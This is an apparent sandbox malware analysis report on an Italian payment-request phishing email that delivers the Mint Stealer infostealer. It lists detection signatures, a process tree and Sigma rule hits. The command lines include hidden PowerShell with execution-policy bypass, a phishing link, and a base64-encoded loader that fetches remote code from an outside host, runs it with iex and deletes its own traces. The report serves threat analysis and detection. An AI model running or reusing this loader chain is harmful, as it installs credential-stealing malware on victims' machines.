Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
I_ Ultima richiesta di pagamento finale per Cuzziol beverage s_r_l__.msg

Overview

General Information

Sample name:I_ Ultima richiesta di pagamento finale per Cuzziol beverage s_r_l__.msg
Analysis ID:1557495
MD5:cb84c33545673307198ca7dc864e8e5f
SHA1:f9cbb6e67738eb8235d03d7df218aeea6e510ec9
SHA256:396e4d924a45d551c2c8bcfd147112bbe3128885e22e1e7a593006117759132b
Infos:

Detection

Mint Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Suricata IDS alerts for network traffic
Yara detected Mint Stealer
Yara detected Powershell decode and execute
AI detected potential phishing Email
Bypasses PowerShell execution policy
Loading BitLocker PowerShell Module
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Execution of Powershell Script in Public Folder
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Office Autorun Keys Modification
Sigma detected: Suspicious Electron Application Child Processes
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

Process Tree

  • System is w10x64_ra
  • svchost.exe (PID: 7040 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • OUTLOOK.EXE (PID: 2952 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /f "C:\Users\user\Desktop\I_ Ultima richiesta di pagamento finale per Cuzziol beverage s_r_l__.msg" MD5: 91A5292942864110ED734005B7E005C0)
    • ai.exe (PID: 5668 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "E581CB4A-9BB8-4348-8486-140C3ED4F7CF" "00D1D5C8-8F94-47CD-842C-62D6A2C573DE" "2952" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)
    • chrome.exe (PID: 6556 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://amdwind5xptsm0uvj0ijbsfshyuy0n4vze97vbh.livecasinotipuk.com/EPsAIgNy0L MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
      • chrome.exe (PID: 7144 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=2024,i,7829079969028914035,538796100542532529,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
      • wscript.exe (PID: 8124 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\Fattura87157159.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
        • powershell.exe (PID: 5164 cmdline: powershell -executionpolicy bypass -WindowStyle hidden -c "cmd /q /cC:\Users\user\AppData\Roaming\1Q5Mu4aI.bat" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6732 cmdline: "C:\Windows\system32\cmd.exe" /q /cC:\Users\user\AppData\Roaming\1Q5Mu4aI.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • powershell.exe (PID: 1252 cmdline: powershell -executionpolicy bypass -WindowStyle hidden -file "C:\Users\user\AppData\Roaming\1Q5Mu4aI.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
              • powershell.exe (PID: 6228 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -WindowStyle hidden -c "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JEVycm9yQWN0aW9uUHJlZmVyZW5jZSA9ICJDb250aW51ZSIKCiR4VGN3aUNQOW15QWhlZ0NzU3lZdEdaeDlpNkk5aHRtM1pXWkY0ZkVqdDNMVmdScVRIajZhaDZpWUw2ZUVqZ0Z0NXpoVjdwTWNXZDNtOHE4ckswWTd6cnNMViA9ICQoLWpvaW4gKCg2NS4uOTApICsgKDk3Li4xMjIpIHwgR2V0LVJhbmRvbSAtQ291bnQgNSB8ICUge1tjaGFyXSRffSkpOwokcWtxakh2YnlBQzBzZmdleUp3MDB0c1lMSElMWlpvT3djWkpLdUVvWXhmWWtLeWtSYW5pNWpaZ0trWU9uSzdCYVlJcjFFYXg1d1BIdVhObzlFZ0JiZFlUaU1qY01HRiA9IFtpbnRdKEdldC1EYXRlIC1Gb3JtYXQgSEgpOwokbHBoRjBrVHpGc1h4cWdEamNVNThiQ0FxTWViSkZtT3Q1N0FvZFBJS3NORnZOY3J0bmdDM3lsY25oVWdHTjJhemExcVJuQlprVTE4Y0ZGZDUgPSBbaW50XShHZXQtRGF0ZSAtRm9ybWF0IG1tKTsKJGxwaEYwa1R6RnNYeHFnRGpjVTU4YkNBcU1lYkpGbU90NTdBb2RQSUtzTkZ2TmNydG5nQzN5bGNuaFVnR04yYXphMXFSbkJaa1UxOGNGRmQ1QWRkID0gMzsKSWYgKCRscGhGMGtUekZzWHhxZ0RqY1U1OGJDQXFNZWJKRm1PdDU3QW9kUElLc05Gdk5jcnRuZ0MzeWxjbmhVZ0dOMmF6YTFxUm5CWmtVMThjRkZkNSArICRscGhGMGtUekZzWHhxZ0RqY1U1OGJDQXFNZWJKRm1PdDU3QW9kUElLc05Gdk5jcnRuZ0MzeWxjbmhVZ0dOMmF6YTFxUm5CWmtVMThjRkZkNUFkZCAtZ3QgNTkpIHsKICAgICRxa3FqSHZieUFDMHNmZ2V5SncwMHRzWUxISUxaWm9Pd2NaSkt1RW9ZeGZZa0t5a1Jhbmk1alpnS2tZT25LN0JhWUlyMUVheDV3UEh1WE5vOUVnQmJkWVRpTWpjTUdGID0gJHFrcWpIdmJ5QUMwc2ZnZXlKdzAwdHNZTEhJTFpab093Y1pKS3VFb1l4ZllrS3lrUmFuaTVqWmdLa1lPbks3QmFZSXIxRWF4NXdQSHVYTm85RWdCYmRZVGlNamNNR0YgKyAxOwogICAgJGxwaEYwa1R6RnNYeHFnRGpjVTU4YkNBcU1lYkpGbU90NTdBb2RQSUtzTkZ2TmNydG5nQzN5bGNuaFVnR04yYXphMXFSbkJaa1UxOGNGRmQ1ID0gJGxwaEYwa1R6RnNYeHFnRGpjVTU4YkNBcU1lYkpGbU90NTdBb2RQSUtzTkZ2TmNydG5nQzN5bGNuaFVnR04yYXphMXFSbkJaa1UxOGNGRmQ1ICsgJGxwaEYwa1R6RnNYeHFnRGpjVTU4YkNBcU1lYkpGbU90NTdBb2RQSUtzTkZ2TmNydG5nQzN5bGNuaFVnR04yYXphMXFSbkJaa1UxOGNGRmQ1QWRkIC0gNjA7Cn0gRWxzZSB7CiAgICAkbHBoRjBrVHpGc1h4cWdEamNVNThiQ0FxTWViSkZtT3Q1N0FvZFBJS3NORnZOY3J0bmdDM3lsY25oVWdHTjJhemExcVJuQlprVTE4Y0ZGZDUgPSAkbHBoRjBrVHpGc1h4cWdEamNVNThiQ0FxTWViSkZtT3Q1N0FvZFBJS3NORnZOY3J0bmdDM3lsY25oVWdHTjJhemExcVJuQlprVTE4Y0ZGZDUgKyAkbHBoRjBrVHpGc1h4cWdEamNVNThiQ0FxTWViSkZtT3Q1N0FvZFBJS3NORnZOY3J0bmdDM3lsY25oVWdHTjJhemExcVJuQlprVTE4Y0ZGZDVBZGQ7Cn07CiRxa3FqSHZieUFDMHNmZ2V5SncwMHRzWUxISUxaWm9Pd2NaSkt1RW9ZeGZZa0t5a1Jhbmk1alpnS2tZT25LN0JhWUlyMUVheDV3UEh1WE5vOUVnQmJkWVRpTWpjTUdGID0gSWYgKFtpbnRdKEdldC1EYXRlIC1Gb3JtYXQgSEgpICsgMSAtZ3QgMjMpIHsiMDAifSBFbHNlIHskcWtxakh2YnlBQzBzZmdleUp3MDB0c1lMSElMWlpvT3djWkpLdUVvWXhmWWtLeWtSYW5pNWpaZ0trWU9uSzdCYVlJcjFFYXg1d1BIdVhObzlFZ0JiZFlUaU1qY01HRn07CiRxNHNrM0Z2eDE4eVRVNzZBbVhKeGtGelBtUWlTTSA9ICQoLWpvaW4gKCg2NS4uOTApICsgKDk3Li4xMjIpIHwgR2V0LVJhbmRvbSAtQ291bnQgMTIgfCAlIHtbY2hhcl0kX30pKTsKJGJpRFdYRDJWYkhQID0gQCIKJEVycm9yQWN0aW9uUHJlZmVyZW5jZSA9ICJDb250aW51ZSIKY3VybCAtdXNlYiAiaHR0cDovL3JpZ3p1dnppM2JuejMudG9wLzEucGhwP3M9bWludHMxMyIgfCBpZXg7ClJlbW92ZS1JdGVtICJDOlxVc2Vyc1xQdWJsaWNcRG9jdW1lbnRzXCQoJHE0c2szRnZ4MTh5VFU3NkFtWEp4a0Z6UG1RaVNNKS5wczEiIC1Gb3JjZSAKIkA7CgoicG93ZXJzaGVsbCAtbm9wcm9maWxlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC1XaW5kb3dTdHlsZSBoaWRkZW4gLWMgJCgkYmlEV1hEMlZiSFApIiB8IE91dC1GaWxlIC1GaWxlUGF0aCAiQzpcVXNlcnNcUHVibGljXERvY3VtZW50c1wkKCRxNHNrM0Z2eDE4eVRVNzZBbVhKeGtGelBtUWlTTSkucHMxIjsKcG93ZXJzaGVsbCAtbm9wcm9maWxlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC1XaW5kb3dTdHlsZSBoaWRkZW4gLUZpbGUgQzpcVXNlcnNcUHVibGljXERvY3VtZW50c1wkKCRxNHNrM0Z2eDE4eVRVNzZBbVhKeGtGelBtUWlTTSkucHMxClJlbW92ZS1JdGVtICIkZW52OkFQUERBVEFcKi5wczEiIC1Gb3JjZQpSZW1vdmUtSXRlbSAiJGVudjpBUFBEQVRBXCouYmF0IiAtRm9yY2UK')) | iex" MD5: 04029E121A0CFA5991749937DD22A1D9)
                • powershell.exe (PID: 7556 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -File C:\Users\Public\Documents\ANwibhLHfyrt.ps1 MD5: 04029E121A0CFA5991749937DD22A1D9)
                  • powershell.exe (PID: 1304 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -c Continue = Continue MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\1Q5Mu4aI.ps1JoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security
    C:\Users\user\AppData\Roaming\1Q5Mu4aI.ps1JoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security
      C:\Users\user\AppData\Roaming\1Q5Mu4aI.ps1JoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security
        C:\Users\user\AppData\Roaming\1Q5Mu4aI.ps1JoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000013.00000002.1995057086.00000241A5DD1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MintStealer_1Yara detected Mint StealerJoe Security
            00000013.00000002.1995057086.00000241A4917000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MintStealer_1Yara detected Mint StealerJoe Security

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Base64 Encoded PowerShell Command Detected
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -WindowStyle hidden -c "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JEVycm9yQWN0aW9uUHJlZmVyZW5jZSA9ICJDb250aW51ZSIKCiR4VGN3aUNQOW15QWhlZ0NzU3lZdEdaeDlpNkk5aHRtM1pXWkY0ZkVqdDNMVmdScVRIajZhaDZpWUw2ZUVqZ0Z0NXpoVjdwTWNXZDNtOHE4ckswWTd6cnNMViA9ICQoLWpvaW4gKCg2NS4uOTApICsgKDk3Li4xMjIpIHwgR2V0LVJhbmRvbSAtQ291bnQgNSB8ICUge1tjaGFyXSRffSkpOwokcWtxakh2YnlBQzBzZmdleUp3MDB0c1lMSElMWlpvT3djWkpLdUVvWXhmWWtLeWtSYW5pNWpaZ0trWU9uSzdCYVlJcjFFYXg1d1BIdVhObzlFZ0JiZFlUaU1qY01HRiA9IFtpbnRdKEdldC1EYXRlIC1Gb3JtYXQgSEgpOwokbHBoRjBrVHpGc1h4cWdEamNVNThiQ0FxTWViSkZtT3Q1N0FvZFBJS3NORnZOY3J0bmdDM3lsY25oVWdHTjJhemExcVJuQlprVTE4Y0ZGZDUgPSBbaW50XShHZXQtRGF0ZSAtRm9ybWF0IG1tKTsKJGxwaEYwa1R6RnNYeHFnRGpjVTU4YkNBcU1lYkpGbU90NTdBb2RQSUtzTkZ2TmNydG5nQzN5bGNuaFVnR04yYXphMXFSbkJaa1UxOGNGRmQ1QWRkID0gMzsKSWYgKCRscGhGMGtUekZzWHhxZ0RqY1U1OGJDQXFNZWJKRm1PdDU3QW9kUElLc05Gdk5jcnRuZ0MzeWxjbmhVZ0dOMmF6YTFxUm5CWmtVMThjRkZkNSArICRscGhGMGtUekZzWHhxZ0RqY1U1OGJDQXFNZWJKRm1PdDU3QW9kUElLc05Gdk5jcnRuZ0MzeWxjbmhVZ0dOMmF6YTFxUm5CWmtVMThjRkZkNUFkZCAtZ3QgNTkpIHsKICAgICRxa3FqSHZieUFDMHNmZ2V5SncwMHRzWUxISUxaWm9Pd2NaSkt1RW9ZeGZZa0t5a1Jhbmk1alpnS2tZT25LN0JhWUlyMUVheDV3UEh1WE5vOUVnQmJkWVRpTWpjTUdGID0gJHFrcWpIdmJ5QUMwc2ZnZXlKdzAwdHNZTEhJTFpab093Y1pKS3VFb1l4ZllrS3lrUmFuaTVqWmdLa1lPbks3QmFZSXIxRWF4NXdQSHVYTm85RWdCYmRZVGlNamNNR0YgKyAxOwogICAgJGxwaEYwa1R6RnNYeHFnRGpjVTU4YkNBcU1lYkpGbU90NTdBb2RQSUtzTkZ2TmNydG5nQzN5bGNuaFVnR04yYXphMXFSbkJaa1UxOGNGRmQ1ID0gJGxwaEYwa1R6RnNYeHFnRGpjVTU4YkNBcU1lYkpGbU90NTdBb2RQSUtzTkZ2TmNydG5nQzN5bGNuaFVnR04yYXphMXFSbkJaa1UxOGNGRmQ1ICsgJGxwaEYwa1R6RnNYeHFnRGpjVTU4YkNBcU1lYkpGbU90NTdBb2RQSUtzTkZ2TmNydG5nQzN5bGNuaFVnR04yYXphMXFSbkJaa1UxOGNGRmQ1QWRkIC0gNjA7Cn0gRWxzZSB7CiAgICAkbHBoRjBrVHpGc1h4cWdEamNVNThiQ0FxTWViSkZtT3Q1N0FvZFBJS3NORnZOY3J0bmdDM3lsY25oVWdHTjJhemExcVJuQlprVTE4Y0ZGZDUgPSAkbHBoRjBrVHpGc1h4cWdEamNVNThiQ0FxTWViSkZtT3Q1N0FvZFBJS3NORnZOY3J0bmdDM3lsY25oVWdHTjJhemExcVJuQlprVTE4Y0ZGZDUgKyAkbHBoRjBrVHpGc1h4cWdEamNVNThiQ0FxTWViSkZtT3Q1N0FvZFBJS3NORnZOY3J0bmdDM3lsY25oVWdHTjJhemExcVJuQlprVTE4Y0ZGZDVBZGQ7Cn07CiRxa3FqSHZieUFDMHNmZ2V5SncwMHRzWUxISUxaWm9Pd2NaSkt1RW9ZeGZZa0t5a1Jhbmk1alpnS2tZT25LN0JhWUlyMUVheDV3UEh1WE5vOUVnQmJkWVRpTWpjTUdGID0gSWYgKFtpbnRdKEdldC1EYXRlIC1Gb3JtYXQgSEgpICsgMSAtZ3QgMjMpIHsiMDAifSBFbHNlIHskcWtxakh2YnlBQzBzZmdleUp3MDB0c1lMSElMWlpvT3djWkpLdUVvWXhmWWtLeWtSYW5pNWpaZ0trWU9uSzdCYVlJcjFFYXg1d1BIdVhObzlFZ0JiZFlUaU1qY01HRn07CiRxNHNrM0Z2eDE4eVRVNzZBbVhKeGtGelBtUWlTTSA9ICQoLWpvaW4gKCg2NS4uOTApICsgKDk3Li4xMjIpIHwgR2V0LVJhbmRvbSAtQ291bnQgMTIgfCAlIHtbY2hhcl0kX30pKTsKJGJpRFdYRDJWYkhQID0gQCIKJEVycm9yQWN0aW9uUHJlZmVyZW5jZSA9ICJDb250aW51ZSIKY3VybCAtdXNlYiAiaHR0cDovL3JpZ3p1dnppM2JuejMudG9wLzEucGhwP3M9bWludHMxMyIgfCBpZXg7ClJlbW92ZS1JdGVtICJDOlxVc2Vyc1xQdWJsaWNcRG9jdW1lbnRzXCQoJHE0c2szRnZ4MTh5VFU3NkFtWEp4a0Z6UG1RaVNNKS5wczEiIC1Gb3JjZSAKIkA7CgoicG93ZXJzaGVsbCAtbm9wcm9maWxlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC1XaW5kb3dTdHlsZSBoaWRkZW4gLWMgJCgkYmlEV1hEMlZiSFApIiB8IE91dC
              Sigma detected: Execution of Powershell Script in Public Folder
              Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -File C:\Users\Public\Documents\ANwibhLHfyrt.ps1, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -File C:\Users\Public\Documents\ANwibhLHfyrt.ps1, CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -WindowStyle hidden -c "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JEVycm9yQWN0aW9uUHJlZmVyZW5jZSA9ICJDb250aW51ZSIKCiR4VGN3aUNQOW15QWhlZ0NzU3lZdEdaeDlpNkk5aHRtM1pXWkY0ZkVqdDNMVmdScVRIajZhaDZpWUw2ZUVqZ0Z0NXpoVjdwTWNXZDNtOHE4ckswWTd6cnNMViA9ICQoLWpvaW4gKCg2NS4uOTApICsgKDk3Li4xMjIpIHwgR2V0LVJhbmRvbSAtQ291bnQgNSB8ICUge1tjaGFyXSRffSkpOwokcWtxakh2YnlBQzBzZmdleUp3MDB0c1lMSElMWlpvT3djWkpLdUVvWXhmWWtLeWtSYW5pNWpaZ0trWU9uSzdCYVlJcjFFYXg1d1BIdVhObzlFZ0JiZFlUaU1qY01HRiA9IFtpbnRdKEdldC1EYXRlIC1Gb3JtYXQgSEgpOwokbHBoRjBrVHpGc1h4cWdEamNVNThiQ0FxTWViSkZtT3Q1N0FvZFBJS3NORnZOY3J0bmdDM3lsY25oVWdHTjJhemExcVJuQlprVTE4Y0ZGZDUgPSBbaW50XShHZXQtRGF0ZSAtRm9ybWF0IG1tKTsKJGxwaEYwa1R6RnNYeHFnRGpjVTU4YkNBcU1lYkpGbU90NTdBb2RQSUtzTkZ2TmNydG5nQzN5bGNuaFVnR04yYXphMXFSbkJaa1UxOGNGRmQ1QWRkID0gMzsKSWYgKCRscGhGMGtUekZzWHhxZ0RqY1U1OGJDQXFNZWJKRm1PdDU3QW9kUElLc05Gdk5jcnRuZ0MzeWxjbmhVZ0dOMmF6YTFxUm5CWmtVMThjRkZkNSArICRscGhGMGtUekZzWHhxZ0RqY1U1OGJDQXFNZWJKRm1PdDU3QW9kUElLc05Gdk5jcnRuZ0MzeWxjbmhVZ0dOMmF6YTFxUm5CWmtVMThjRkZkNUFkZCAtZ3QgNTkpIHsKICAgICRxa3FqSHZieUFDMHNmZ2V5SncwMHRzWUxISUxaWm9Pd2NaSkt1RW9ZeGZZa0t5a1Jhbmk1alpnS2tZT25LN0JhWUlyMUVheDV3UEh1WE5vOUVnQmJkWVRpTWpjTUdGID0gJHFrcWpIdmJ5QUMwc2ZnZXlKdzAwdHNZTEhJTFpab093Y1pKS3VFb1l4ZllrS3lrUmFuaTVqWmdLa1lPbks3QmFZSXIxRWF4NXdQSHVYTm85RWdCYmRZVGlNamNNR0YgKyAxOwogICAgJGxwaEYwa1R6RnNYeHFnRGpjVTU4YkNBcU1lYkpGbU90NTdBb2RQSUtzTkZ2TmNydG5nQzN5bGNuaFVnR04yYXphMXFSbkJaa1UxOGNGRmQ1ID0gJGxwaEYwa1R6RnNYeHFnRGpjVTU4YkNBcU1lYkpGbU90NTdBb2RQSUtzTkZ2TmNydG5nQzN5bGNuaFVnR04yYXphMXFSbkJaa1UxOGNGRmQ1ICsgJGxwaEYwa1R6RnNYeHFnRGpjVTU4YkNBcU1lYkpGbU90NTdBb2RQSUtzTkZ2TmNydG5nQzN5bGNuaFVnR04yYXphMXFSbkJaa1UxOGNGRmQ1QWRkIC0gNjA7Cn0gRWxzZSB7CiAgICAkbHBoRjBrVHpGc1h4cWdEamNVNThiQ0FxTWViSkZtT3Q1N0FvZFBJS3NORnZOY3J0bmdDM3lsY25oVWdHTjJhemExcVJuQlprVTE4Y0ZGZDUgPSAkbHBoRjBrVHpGc1h4cWdEamNVNThiQ0FxTWViSkZtT3Q1N0FvZFBJS3NORnZOY3J0bmdDM3lsY25oVWdHTjJhemExcVJuQlprVTE4Y0ZGZDUgKyAkbHBoRjBrVHpGc1h4cWdEamNVNThiQ0FxTWViSkZtT3Q1N0FvZFBJS3NORnZOY3J0bmdDM3lsY25oVWdHTjJhemExcVJuQlprVTE4Y0ZGZDVBZGQ7Cn07CiRxa3FqSHZieUFDMHNmZ2V5SncwMHRzWUxISUxaWm9Pd2NaSkt1RW9ZeGZZa0t5a1Jhbmk1alpnS2tZT25LN0JhWUlyMUVheDV3UEh1WE5vOUVnQmJkWVRpTWpjTUdGID0gSWYgKFtpbnRdKEdldC1EYXRlIC1Gb3JtYXQgSEgpICsgMSAtZ3QgMjMpIHsiMDAifSBFbHNlIHskcWtxakh2YnlBQzBzZmdleUp3MDB0c1lMSElMWlpvT3d
              Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -WindowStyle hidden -c "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JEVycm9yQWN0aW9uUHJlZmVyZW5jZSA9ICJDb250aW51ZSIKCiR4VGN3aUNQOW15QWhlZ0NzU3lZdEdaeDlpNkk5aHRtM1pXWkY0ZkVqdDNMVmdScVRIajZhaDZpWUw2ZUVqZ0Z0NXpoVjdwTWNXZDNtOHE4ckswWTd6cnNMViA9ICQoLWpvaW4gKCg2NS4uOTApICsgKDk3Li4xMjIpIHwgR2V0LVJhbmRvbSAtQ291bnQgNSB8ICUge1tjaGFyXSRffSkpOwokcWtxakh2YnlBQzBzZmdleUp3MDB0c1lMSElMWlpvT3djWkpLdUVvWXhmWWtLeWtSYW5pNWpaZ0trWU9uSzdCYVlJcjFFYXg1d1BIdVhObzlFZ0JiZFlUaU1qY01HRiA9IFtpbnRdKEdldC1EYXRlIC1Gb3JtYXQgSEgpOwokbHBoRjBrVHpGc1h4cWdEamNVNThiQ0FxTWViSkZtT3Q1N0FvZFBJS3NORnZOY3J0bmdDM3lsY25oVWdHTjJhemExcVJuQlprVTE4Y0ZGZDUgPSBbaW50XShHZXQtRGF0ZSAtRm9ybWF0IG1tKTsKJGxwaEYwa1R6RnNYeHFnRGpjVTU4YkNBcU1lYkpGbU90NTdBb2RQSUtzTkZ2TmNydG5nQzN5bGNuaFVnR04yYXphMXFSbkJaa1UxOGNGRmQ1QWRkID0gMzsKSWYgKCRscGhGMGtUekZzWHhxZ0RqY1U1OGJDQXFNZWJKRm1PdDU3QW9kUElLc05Gdk5jcnRuZ0MzeWxjbmhVZ0dOMmF6YTFxUm5CWmtVMThjRkZkNSArICRscGhGMGtUekZzWHhxZ0RqY1U1OGJDQXFNZWJKRm1PdDU3QW9kUElLc05Gdk5jcnRuZ0MzeWxjbmhVZ0dOMmF6YTFxUm5CWmtVMThjRkZkNUFkZCAtZ3QgNTkpIHsKICAgICRxa3FqSHZieUFDMHNmZ2V5SncwMHRzWUxISUxaWm9Pd2NaSkt1RW9ZeGZZa0t5a1Jhbmk1alpnS2tZT25LN0JhWUlyMUVheDV3UEh1WE5vOUVnQmJkWVRpTWpjTUdGID0gJHFrcWpIdmJ5QUMwc2ZnZXlKdzAwdHNZTEhJTFpab093Y1pKS3VFb1l4ZllrS3lrUmFuaTVqWmdLa1lPbks3QmFZSXIxRWF4NXdQSHVYTm85RWdCYmRZVGlNamNNR0YgKyAxOwogICAgJGxwaEYwa1R6RnNYeHFnRGpjVTU4YkNBcU1lYkpGbU90NTdBb2RQSUtzTkZ2TmNydG5nQzN5bGNuaFVnR04yYXphMXFSbkJaa1UxOGNGRmQ1ID0gJGxwaEYwa1R6RnNYeHFnRGpjVTU4YkNBcU1lYkpGbU90NTdBb2RQSUtzTkZ2TmNydG5nQzN5bGNuaFVnR04yYXphMXFSbkJaa1UxOGNGRmQ1ICsgJGxwaEYwa1R6RnNYeHFnRGpjVTU4YkNBcU1lYkpGbU90NTdBb2RQSUtzTkZ2TmNydG5nQzN5bGNuaFVnR04yYXphMXFSbkJaa1UxOGNGRmQ1QWRkIC0gNjA7Cn0gRWxzZSB7CiAgICAkbHBoRjBrVHpGc1h4cWdEamNVNThiQ0FxTWViSkZtT3Q1N0FvZFBJS3NORnZOY3J0bmdDM3lsY25oVWdHTjJhemExcVJuQlprVTE4Y0ZGZDUgPSAkbHBoRjBrVHpGc1h4cWdEamNVNThiQ0FxTWViSkZtT3Q1N0FvZFBJS3NORnZOY3J0bmdDM3lsY25oVWdHTjJhemExcVJuQlprVTE4Y0ZGZDUgKyAkbHBoRjBrVHpGc1h4cWdEamNVNThiQ0FxTWViSkZtT3Q1N0FvZFBJS3NORnZOY3J0bmdDM3lsY25oVWdHTjJhemExcVJuQlprVTE4Y0ZGZDVBZGQ7Cn07CiRxa3FqSHZieUFDMHNmZ2V5SncwMHRzWUxISUxaWm9Pd2NaSkt1RW9ZeGZZa0t5a1Jhbmk1alpnS2tZT25LN0JhWUlyMUVheDV3UEh1WE5vOUVnQmJkWVRpTWpjTUdGID0gSWYgKFtpbnRdKEdldC1EYXRlIC1Gb3JtYXQgSEgpICsgMSAtZ3QgMjMpIHsiMDAifSBFbHNlIHskcWtxakh2YnlBQzBzZmdleUp3MDB0c1lMSElMWlpvT3djWkpLdUVvWXhmWWtLeWtSYW5pNWpaZ0trWU9uSzdCYVlJcjFFYXg1d1BIdVhObzlFZ0JiZFlUaU1qY01HRn07CiRxNHNrM0Z2eDE4eVRVNzZBbVhKeGtGelBtUWlTTSA9ICQoLWpvaW4gKCg2NS4uOTApICsgKDk3Li4xMjIpIHwgR2V0LVJhbmRvbSAtQ291bnQgMTIgfCAlIHtbY2hhcl0kX30pKTsKJGJpRFdYRDJWYkhQID0gQCIKJEVycm9yQWN0aW9uUHJlZmVyZW5jZSA9ICJDb250aW51ZSIKY3VybCAtdXNlYiAiaHR0cDovL3JpZ3p1dnppM2JuejMudG9wLzEucGhwP3M9bWludHMxMyIgfCBpZXg7ClJlbW92ZS1JdGVtICJDOlxVc2Vyc1xQdWJsaWNcRG9jdW1lbnRzXCQoJHE0c2szRnZ4MTh5VFU3NkFtWEp4a0Z6UG1RaVNNKS5wczEiIC1Gb3JjZSAKIkA7CgoicG93ZXJzaGVsbCAtbm9wcm9maWxlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC1XaW5kb3dTdHlsZSBoaWRkZW4gLWMgJCgkYmlEV1hEMlZiSFApIiB8IE91dC
              Sigma detected: Script Interpreter Execution From Suspicious Folder
